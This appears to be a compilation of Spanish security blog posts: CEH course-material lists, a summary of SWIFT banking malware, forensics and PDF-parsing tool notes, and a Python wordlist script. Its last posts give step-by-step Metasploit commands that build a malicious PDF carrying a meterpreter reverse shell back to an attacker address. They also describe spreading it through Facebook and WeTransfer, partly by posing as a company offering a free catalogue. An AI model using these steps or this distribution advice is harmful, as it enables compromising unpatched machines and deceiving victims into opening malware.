Toda la Documentación CEHv9

Este fin de semana he de darle muy duro al tema del CEH así que os dejo con toda la documentación que tengo ahora mismo por si os atrevéis a sacaros la certificación vosotros también:

• CEHv9_Module_01_Introduction_to_Ethical_Hacking 
• CEHv9_Module_02_Footprinting_and_Reconnaissance 
• CEHv9_Module_03_Scanning_Networks 
• CEHv9_Module_04_Enumeration 
• CEHv9_Module_05_System_Hacking 
• CEHv9_Module_06_Malware_Threats 
• CEHv9_Module_07_Sniffing 
• CEHv9_Module_08_Social_Engineering 
• CEHv9_Module_09_Denial-of-Service 
• CEHv9_Module_10_Session_Hijacking 
• CEHv9_Module_11_Hacking_Webservers 
• CEHv9_Module_12_Hacking_Web_Applications 
• CEHv9_Module_13_SQL_Injection 
• CEHv9_Module_14_Hacking_Wireless_Networks 
• CEHv9_Module_15_Hacking_Mobile_Platforms 
• CEHv9_Module_16_Evading_IDS%2C_Firewalls 
• CEHv9_Module_17_Cloud_Computing 
• CEHv9_Module_18_Cryptography 

Siento que sea una entrada super corta, pero ya sabéis la razón y ademas tengo un forense pendiente de ayer ya que el smartphone me va raro...

Mas información, herramientas y Labs:

• https://underc0de.org/foro/hacking/ceh-v9-certified-ethical-hacker-v9-course-pdf-tools/

Sed Buenos ,) 

Luz a los ataques SWIFT

Ya sabéis que están empezando a caer bastantes bancos de alrededor del mundo a causa de los ataques a SWIFT y del Malware que lo provoca. Así que, gracias a que Mcafee ha podido "diseccionar" el bicho en cuestión, ahora podemos arrojar un poco de luz a tan sonado tema.  

Estamos hablando de un Malware que es capaz de encontrar la ruta de una instalación del lector de pdf Foxit, instalarse el mismo en esa ruta y renombrar el archivo original a FoxitReader.exe. Claro, al ejecutar el Foxit Reader de mentida el malware se ejecuta y escribe un archivo de log en tmp (archivos temporales) codificado en XOR.

La verdad es que su funcionamiento es muy curioso y esta claro que quienes lo diseñaron sabian de SWIFT. (al menos mucho mas que yo XD) si tenéis curiosidad sobre las entrañas del malware y el log os recomiendo leer la fuente: 

• https://blogs.mcafee.com/mcafee-labs/attacks-swift-banking-system-benefit-insider-knowledge/

Sed Buenos ;) 

Toda La Documentación Para el CEHv8

Como ya sabéis algunos el día 13 de octubre tengo programado el examen del CEH, así que me he de poner las pilas y realizar test o leer contra mas información mejor. Desde aquí muchas gracias a [K2r4y] que ha compartido conmigo mucha información. Adames, para todos los que también estáis en este proceso, aquí tenéis toda la documentación de la versión 8 del CEh que el blog [Hackplayer] compartió hace unos días.

Temario:

• CEHV8 Module 01 Introduction to Ethical Hacking.pdf
• CEHv8 Module 02 Footprinting and Reconnaissance.pdf
• CEHv8 Module 03 Scanning Networks.pdf
• CEHv8 Module 04 Enumeration.pdf
• CEHv8 Module 05 System Hacking .pdf
• CEHv8 Module 06 Trojans and Backdoors.pdf
• CEHv8 Module 07 Viruses and Worms.pdf
• CEHv8 Module 08 Sniffing.pdf
• CEHv8 Module 09 Social Engineering.pdf
• CEHv8 Module 10 Denial of Service.pdf
• CEHv8 Module 11 Session Hijacking.pdf
• CEHv8 Module 12 Hacking Webservers.pdf
• CEHv8 Module 13 Hacking Web Applications .pdf
• CEHv8 Module 14 SQL Injection.pdf
• CEHv8 Module 15 Hacking Wireless Network
• CEHv8 Module 16 Hacking Mobile Platforms.pdf
• CEHv8 Module 17 Evading IDS, Firewalls, and Honeypots.pdf
• CEHv8 Module 18 Buffer Overflow.pdf
• CEHv8 Module 19 Cryptography.pdf
• CEHv8 Module 20 Penetration Testing.pdf
• CEHv8 References.pdf

Fuente:

• http://www.hackplayers.com/2015/10/ceh-v8-curso-completo-en-pdf.html

Sed Buenos ;) 

INCIBE.- Guía De Toma De Evidencias En Windows.

Hoy, haciendo un poco de búsqueda en INCIBE ya que entro de tanto en tanto para ver que novedades hay. Además que sus avisos de seguridad, en mi opinion son muy acertados y merecen la pena. 

Hoy no he ido directo a los avisos como suelo hacer las mayoría de veces sino que me he puesto a curiosear noticias. Cual ha sido mi sorpresa al encontrarme con un tremendo pdf dedicado a la Adquisición de evidencias en Windows al mas puro estilo Forense y avalado por el Ministerio. 

La verdad es que esta esta bastante completa y me ha dado mas de una idea para dedicarme un tiempo mas con mis queridos scripts en Python. 

Un lujo poder disponer de un material tan bueno. No os lo puedo recomendar lo suficiente. Os dejo el enlace aquí abajo para que le echéis un ojo vosotros mismos. 

• https://www.incibe.es/extfrontinteco/img/File/intecocert/ManualesGuias/incibe_toma_evidencias_analisis_forense.pdf

Fuente: 

• https://www.incibe.es/CERT/guias_estudios/guias/toma_evidencias_windows

Sed Buenos ;) 

PdftoText + Python = Diccionario

Hoy me he puesto a jugar con Pdf to Text un programa bien junto [a la suit xPDF] capaz de extraer texto de un archivo.pdf y devolverlo en un .txt. Hasta aquí todo bien, ya que es un programa muy fácil de utilizar y da muy buenos resultados. 

El Usage  de pdftotext es bastante sencillo.

Así que, una vez que ya tenia el .txt con el texto que quería, pensé en que seria muy guay poder ordenar por lineas cada una de las palabras y poder hacer un diccionario con ellas. Así que me he puesto a investigar para poder hacerlo en Python. 

Este es el script que ha salido:

d1 = raw_input("Dame el archivo: ")

with open(d1,'r') as f:

    for line in f:

        for word in line.split():

           dic = open("dicslipt.txt","a+")

           dic.write(word + "\n")

           print word

    print "split done"

Si os lo queréis descargar esta en mi GitHub: 

• https://github.com/StateX/PoCSplit-Dic

Se puede mejorar de muchas maneras, asi que dejo en vuestras manos los posibles commits y por si no os ha quedado claro el proceso que he utilizado para crear este un diccionario.txt gracias archivos .pdf aquí os dejo el vídeo que he grabado esta tarde. 

Sed Buenos con esto 0;) 

Canal Pirata de Snifer XXII - Developing For Firefox Os Quick Guide

Hola señores Lunes y vengo con la entrada de ayer, si ando algo loco pero que le hacemos es mi espacio en el blog del Gringo aka State_X como ven en el titulo es un libro relacionado al desarrollo de aplicaciones para FirefoxOS super corto pero al grano!!!

El siguiente libro es una guia de desarrollo rapido para firefoxOS con lo cual nos brinda todo lo que necesitamos para iniciar, en el mundo del zorro, como vieron la entrada de ayer, comenzare a meter mano y caña como dicen algunos a esta plataforma y lo primero que leer sera el libro no va mas de 80 Hojas, eso quiere decir que podemos leerlo rápido para comprender el desarrollo en esta plataforma, si se van a descargar el libro les pide registrarse y hacer una donación si gustan, algo que para nada me agrado es forzar a que registremos nuestro correo electrónico ya que desde allí nos brindan recien los enlaces para descargar algo molestoso :/ si es free que sea totalmente sin pedir dato alguno, los que quieran lo hacen desde el site oficial, o bien para ver mejoras y demas tenemos el Repositorio GitHub donde se puede seguir los cambios, y aportes que da la comunidad, este librito anda mas viable para ser comido por CraftBooks ;) que el otro que iniciamos de traducción con Albert, aunque Fear the Foca domala anda por buen camino en estos días iremos sacando actualizaciones .

Lo bueno, es que tenemos 3 presentaciones para descarga Epub, Mobi, y PDF para tenerlo en todo lado.

• [EPUB] Developing For Firefox OS Quick Guide 
• [MOBI] Developing For Firefox OS Quick Guide
• [PDF] Developing For Firefox OS Quick Guide

Regards,
Snifer

Canal Pirata de Snifer VII - Malware CookBook

Debido a un problema de capa 10 el pasado fin de semana no traje la entrada xD, si señores se me fue pense que era otro dia juraba que era viernes :P, por esa razon me olvide completamente pero que va el Gringo Frijolero ni recuerdo me hizo de la elaboración de la entrada, asi que para no fallar este fin de semana venimos con este excelente libro el cual es  Malware CookBook al cual le debo horas de lectura, debido que hasta ahora no logro terminar de leer un solo capitulo! :|.

Pero que va se que a mas  de uno le agradara y si andan interesados en este mundo de Malware (iniciamos el spam :$) en mi blog, ando con una sección dedicada al Malware el cual pueden pasarse y darle mas miraditas a este mundo.

 

Por si la fiesta no se acaba mas detalles del libro y las herramientas pueden acceder al siguiente enlace Aquí entre semana, por no decirlo ayer postee las imagenes forenses de malware del libro aquí podremos acceder al mismo y disfrutar de ello.

Sin mas que decirles, Happy Malware :D

Regards,

Snifer

PDF-Parser.- Bendito Sea Python

No muchos sabrán que las entradas a este blog son totalmente improvisadas, (Supongo que lo habréis supuesto xD) pero la verdad es que tampoco me gusta echar mano de los borrados los evito a no ser que sea imprescindible. Pues hoy ha sido uno de esos días que no tenia ni idea de que escribir, hasta que he visto la entrada de [Seifreed] en [DragonJar] donde presentaba la herramienta PDF-Parser. Una herramienta la mar de útil ni no queremos recurrir a sanboxs o a meterlo en el PeePDF, hecha en Python (Seee e.e) llamada PDF-Parser. Así que he decidido fusilarle la entrada. 

Aquí tenéis todas las opciones con las que podemos jugar con esta herramienta: 

Usage: pdf-parser.py [options] pdf-file|zip-file|url

pdf-parser, use it to parse a PDF document

Options:

• --version show program's version number and exit
• -h, --help show this help message and exit
• -s SEARCH, --search=SEARCH
• string to search in indirect objects (except streams)
• -f, --filter pass stream object through filters (FlateDecode,
• ASCIIHexDecode, ASCII85Decode, LZWDecode and
• RunLengthDecode only)
• -o OBJECT, --object=OBJECT
• id of indirect object to select (version independent)
• -r REFERENCE, --reference=REFERENCE
• id of indirect object being referenced (version
• independent)
• -e ELEMENTS, --elements=ELEMENTS
• type of elements to select (cxtsi)
• -w, --raw raw output for data and filters
• -a, --stats display stats for pdf document
• -t TYPE, --type=TYPE type of indirect object to select
• -v, --verbose display malformed PDF elements
• -x EXTRACT, --extract=EXTRACT
• filename to extract malformed content to
• -H, --hash display hash of objects
• -n, --nocanonicalizedoutput
• do not canonicalize the output
• -d DUMP, --dump=DUMP filename to dump stream content to
• -D, --debug display debug info
• -c, --content display the content for objects without streams or
• with streams without filters
• --searchstream=SEARCHSTREAM
• string to search in streams
• --unfiltered search in unfiltered streams
• --casesensitive case sensitive search in streams
• --regex use regex to search in streams

Source code put in the public domain by Didier Stevens, no Copyright

Use at your own risk https://DidierStevens.com

Espero que os guste y si queréis descargarlo o ver el código fuente de esta herramienta en la fuente:

• http://www.dragonjar.org/pdf-parser-tratando-documentos-pdf.xhtml

Sed Buenos ;) 

We Transfer y Ellos También .- Difusión de Malware.

Hace dos tres tres días descubrí que [Facebook se había puesto las pilas] y que ahora ya analizaba los archivos que se envían por su sistema de mensajería. Como me jorobo el invento juré venganza. Así que hoy, os traigo otra pagina web que se tendría que poner las pilas para que esto no pasara.

We transfer es un sistema de envió de archivos de hasta 2 GB muy útil para cuando te has dejado la memoria USB en casa. Ademas: es muy fácil, rápido de utilizar, permite múltiples archivos y receptores y no requiere registro alguno. Como comprenderéis mucha velocidad tampoco puede ser buena así que hice la pequeña prueba.

Primero [me cree un PDF malicioso] el cual ahora detectan muchos de los antivirus. Al menos en la ultima prueba Hotmail, Gmail y Facebook fuero capaces de dar con el y no permitirme su subida.

Como podéis ver este pdf es detectado por 21 antivirus, muchos de los cuales son marcas sobradamente conocidas. Así que si no me lo pilla esto puede ser una fiesta.  

Como podéis ver por el cursor que se me ha quedado allí en la segunda foto, el pdf a sido transferido sin ningún problema. Vale, ¿veis el botón de (+Add more friend) y la dirección del emisor? Ahora pensad que soy uno de los malos y que queréis pasar un Malware "X". Esto seria tan sencillo como empezar a agregar direcciones de mail indiscriminadamente (además se quedan guardadas para la próxima vez que quieras hacerlo xD) crearte una cuenta de correo falsa (no hace falta ni que exista) y punto. Ademas fácil y cómodo y con una interfaz bonita y acogedora. 

La única pega que le puedo encontrar es que al enviar el archivo (ojo que he dicho cualquier tipo de archivo. Si, los .exe también los deja) se envía un mail al receptor para que vaya a un link a descargar tu archivo. También se envía uno al emisor para comprobar que la subida se ha efectuado bien xDDD 

El mensaje ha sido fruto de mi desesperación con todos los problemas que he tenido con mi maquina virtual estos días con el cambio a Windows 8 (después de que me evangelizaran el la [Up To Secure]). Bueno, ahora solo es el momento de atreverse a descargar el archivo a ver si realmente se ha transferido bien y no es un fail como una casa. 

Pues si chicos y chicas, el archivo se baja de genial, sin ser mínimamente comprobado y ademas en una pagina bien hecha levantando 0 sospechas.  Después de esta demostración solo espero que We Transfer se lea esto ( xDDDDD) y que se ponga las pilas con su seguridad igual que hizo Facebook.

Facebook Se Pone Las Pilas y Me Jode Los Inventos

Hace un tiempo expliqué [como usar pdfs con Metasploit] y por donde distribuirlos. Hoy intentando mejorar ese tutorial intentando clonar algún pdf ya existente a ver si la opción INFILENAME estaba activa con ese exploit (lamentablemente para mi no esta disponible). Bueno, en ese articulo hace ya dos meses descubrí que se podía enviar cualquier tipo de archivo por la mensajería. Pues hoy haciendo el "experimento" me he encontrado con esto. O.O

Mi cara de sorpresa ha sido increíble y juro vendetta xD. ¿Será la hora de sacar artículos explicando como convertir en ninjas vuestros archivos malignos? (se que dije que me lo reservaba para cuando haga algunas charlas por eso me lo estoy pensando). Aunque ha sido una sorpresa agridulce, quiero seguir trabajando en esto. Así que a ponerse las pilas y ha actualizar el articulo.

Pdf Y Metasploit (Parte 1) .- Creación Y Difusión.

Hace ya un tiempo que el ataque con PDF maliciosos esta dando muy buenos resultados. Un PDF de ese tipos tarda mas de 5 minutos en crearse y buscando un medio de difusión correcto puede causar estragos a aquellos que no actualicen su software adecuadamente.

Adobe esta tomando todas las medidas que puede pero no son suficientes. Ya dedique [una tira] respecto a lo que pensaba de la cantidad de ataques que esta recibiendo esta compañía, pero me rondaba la curiosidad y las ganas de poder hacer un PDF malicioso y analizarlo un poco.  Así que me he puesto a ello.

El proceso es fácil, rápido y solo necesitamos los siguientes Ingredientes: 

• Distribución Linux:  Backtrack 5 - R3 ( R1 y R2 también sirven pero ya que estáis bajaros la ultima versión desde la pagina oficial que es gratis. ) http://www.backtrack-linux.org/
• Tener instalado el Metasploit Frameworks (Si os habeis bajado la ultima versión viene de serie con el S.O)
• Un Windows entre XP-7 el cual explotar (os sugiero que lo proveéis en una maquina virtual) 
• Dicho Windows ha de tener una versión de Adobe Reader 9.1 o menor. 

Aunque en esta primera parte solo nos centraremos en la creación y la difusión de este PDF mas vale que tengáis preparada el Windows 7 para mas adelante. 

Para esta investigación nos basaremos en [Adobe PDF Escape EXE Socila Engineering] dado que tiene un rango excelente y actúa en una versión de Adobe no muy vieja. Empecemos a darle caña.

• Una vez en Backtrack abrimos la terminal y escribimos: msfconsole esta operación suele tardar unos minutos. 

•  Cuando acabe de cargar pondremos el siguiente codigo: 

Use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs <-- (seleccionamos el exploit que vamos a usar, el que previamente habremos buscado en la web o en nuestro repositorio y se adecue a nuestras necesidades)

 Set payload windows/meterpreter/reverse_tcp <-- (definimos el [payload] que devolverá el [meterpreter])

Set filename XXXX_XXX.pdf <-- (creamos el archivo pdf con el nombre que queramos)

Set lhost 192.168.1.23 <-- (definimos la IP del atacante por la cual nos pondremos a la escucha en el momento que la victima abra el pdf)

Set lport 8080 <-- (definimos el puerto del atacante, también sera importante para escuchar mas adelante) 

Ya tenemos en nuestro poder el Pdf Malicioso dispuesto a ser distribuido. Tened en cuenta que se guarda en una ruta especial del root/.msf4/local , si no lográis ver la carpeta apretad CONTROL + H  para desocultarlas.

Ahora solo nos queda distribuirlo por donde los antivirus nos dejen. He hecho la prueba con [Virus Total] una Web donde puedes puedes comprobar si un archivo está libre de virus y de la que ya os hablamos aquí en los comienzos de este blog (es la segunda entrad xD). El resultado no ha podido sorprenderme mas, mi pdf se llama Cambios_En_La_Web.

O.O se lo comen 20 antivirus del mercado. 

Por lo que alguna presa grande del sector debe haber caído no? En efecto.

O.O Kaspersky me has fallado. Pero tranquilos que Avast, AVG y Windows Defender si que los caza..

Lo primero que se nos viene a la cabeza a la hora de distribuirlo es a empaquetarlo en un email y tirar de dotes de Ingeniero social para que la victima acabe descargándose el archivo. No va a ser tan fácil ahora mismo la mayoría de sistemas de correo electrónico escanean los archivos que subes, este truco hace tiempo que se conocen así que ya han tomado medidas para ello. Un ejemplo claro son Hotmail con el Trend Micro Pc Cillin o Gmail con su Sophos (aunque solo es un rumor). 

No me esperaba menos de Gmail .

¿He dicho que no podía ser tan fácil? Perdón me he equivocado xDD

0.0 ¿tendría que haber avisado a facebook de esto? 

En efecto en Facebook no hay antivirus así que favorece el crecimiento de estos ataques. Solo has de hacerte pasar por una empresa X que ofrece Y gratis y te entrega un catalogo para que te lo mires guiño guiño. Facil, comodo y en un canal con millones de personas. 

Ahora el problema sera burlar al antivirus que tenga la victima instalado en su equipo y aprenderemos a analizarlos para estar seguros. Pero eso lo dejaremos para otra entrada. 

_______________________________________________________________________________

Las Gracias A Quienes Se Las Merecen:

• http://www.blackploit.com <-- por su pentest al que recurriremos para la segunda parte.
• http://www.seguridadjabali.com <-- por si explicación de payload
• http://thehackerway.com <-- por los conceptos basicos de meterpreter

----------------------------------------------------------------------------------------------------------.